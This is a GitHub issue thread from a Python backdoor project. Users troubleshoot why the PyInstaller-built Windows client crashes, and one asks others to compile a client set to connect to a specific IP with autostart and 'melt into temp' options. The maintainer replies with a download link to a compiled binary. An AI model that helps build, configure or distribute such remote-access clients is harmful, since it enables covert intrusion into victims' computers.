### ISSUE TITLE
Exe Script error

### ISSUE THREAD

**Issue by asdat3** [xp4xbox/Python-Backdoor#49]
**OS: ** Windows10
**Commit/Build:** 27.10.2020 download

Heyyy,
I used this script a year ago and I loved it, I now got a new PC and it doesnt work anymore, I changed python versions, from 3.8 to 3.0 to 3.6.0 to 3.6.8 but none worked 👎 

Everytime I launch the exe it sais: "Failed to execute Script client"
It isn´t launched since the server doesnt get a response and I cant find it in the taskmanager

Meanwhile Pyinstaller is making the exe there was this pkg issue, but I fixed it and it didnt appear anymore but still the exe isnt working

please help,
~ AsdatIndustries

**Comment by xp4xbox** [comment]
Try running the client without compiling it in a command window to see what the output is.

**Comment by asdat3** [comment]
okay just did,
meanwhile running pyinstaller it just said:
`21132 WARNING: Hidden import "pkg_resources.py2_warn" not found!
21133 WARNING: Hidden import "pkg_resources.markers" not found!
21141 INFO: Excluding import of __main__ from module pkg_resources`
again (got it removed on python version 3.6.8)

The Exe is closing instantly, I´ll screenrecord to get exactly the frame where you can see the error

![client_crashes_screen](https://user-images.githubusercontent.com/29544382/97411357-0fbe0700-18f8-11eb-9cc4-8677303ef62a.PNG)

Thank you very much for helping me

**Comment by Y4hL** [comment]
Thats a normal import error, make sure you have all required packages installed

**Comment by asdat3** [comment]
`Requirement already satisfied: pywin32 in c:\users\quent\appdata\local\programs\python\python38\lib\site-packages (from -r requirements.txt (line 1)) (228)
Requirement already satisfied: pyinstaller in c:\users\quent\appdata\local\programs\python\python38\lib\site-packages\pyinstaller-4.1.dev0+d16e173a5e-py3.8.egg (from -r requirements.txt (line 2)) (4.1.dev0+d16e173a5e)
Requirement already satisfied: pyscreeze in c:\users\quent\appdata\local\programs\python\python38\lib\site-packages (from -r requirements.txt (line 3)) (0.1.26)
Requirement already satisfied: pynput in c:\users\quent\appdata\local\programs\python\python38\lib\site-packages (from -r requirements.txt (line 4)) (1.7.1)
Requirement already satisfied: WMI in c:\users\quent\appdata\local\programs\python\python38\lib\site-packages (from -r requirements.txt (line 5)) (1.5.1)
Requirement already satisfied: cryptography in c:\users\quent\appdata\local\programs\python\python38\lib\site-packages (from -r requirements.txt (line 6)) (2.9.2)
Requirement already satisfied: setuptools in c:\users\quent\appdata\local\programs\python\python38\lib\site-packages (from pyinstaller->-r requirements.txt (line 2)) (50.3.2)
Requirement already satisfied: altgraph in c:\users\quent\appdata\local\programs\python\python38\lib\site-packages (from pyinstaller->-r requirements.txt (line 2)) (0.17)
Requirement already satisfied: pyinstaller-hooks-contrib>=2020.6 in c:\users\quent\appdata\local\programs\python\python38\lib\site-packages (from pyinstaller->-r requirements.txt (line 2)) (2020.9)
Requirement already satisfied: pefile>=2017.8.1 in c:\users\quent\appdata\local\programs\python\python38\lib\site-packages (from pyinstaller->-r requirements.txt (line 2)) (2019.4.18)
Requirement already satisfied: pywin32-ctypes>=0.2.0 in c:\users\quent\appdata\local\programs\python\python38\lib\site-packages (from pyinstaller->-r requirements.txt (line 2)) (0.2.0)
Requirement already satisfied: Pillow>=6.2.1 in c:\users\quent\appdata\local\programs\python\python38\lib\site-packages (from pyscreeze->-r requirements.txt (line 3)) (8.0.1)
Requirement already satisfied: six in c:\users\quent\appdata\local\programs\python\python38\lib\site-packages (from pynput->-r requirements.txt (line 4)) (1.11.0)
Requirement already satisfied: cffi!=1.11.3,>=1.8 in c:\users\quent\appdata\local\programs\python\python38\lib\site-packages (from cryptography->-r requirements.txt (line 6)) (1.14.0)
Requirement already satisfied: future in c:\users\quent\appdata\local\programs\python\python38\lib\site-packages (from pefile>=2017.8.1->pyinstaller->-r requirements.txt (line 2)) (0.18.2)
Requirement already satisfied: pycparser in c:\users\quent\appdata\local\programs\python\python38\lib\site-packages (from cffi!=1.11.3,>=1.8->cryptography->-r requirements.txt (line 6)) (2.20)`

**Comment by asdat3** [comment]
ok that looks pretty bad
it sais every module is satisfied already

**Comment by asdat3** [comment]
Is it possible that somebody else here compiles my exe please?
**port:** 3000 (default)
**ip:** 185.78.255.231
**melt into temp:** yes
**autostart:** yes
**UPX:** doesnt matter

would be awesome 👍

**Comment by xp4xbox** [comment]
Works for me

https://drive.google.com/file/d/1T8u0zQEMTyMHdOiB-uD9yunEzT0GVsNc/view?usp=sharing

**Comment by asdat3** [comment]
thank you so much <3

**Comment by chinemys** [comment]
i have the same error running after building the client
win10 prox64 Python 3.9.4

**Comment by xp4xbox** [comment]
Try running it without building it and see if there is an error.
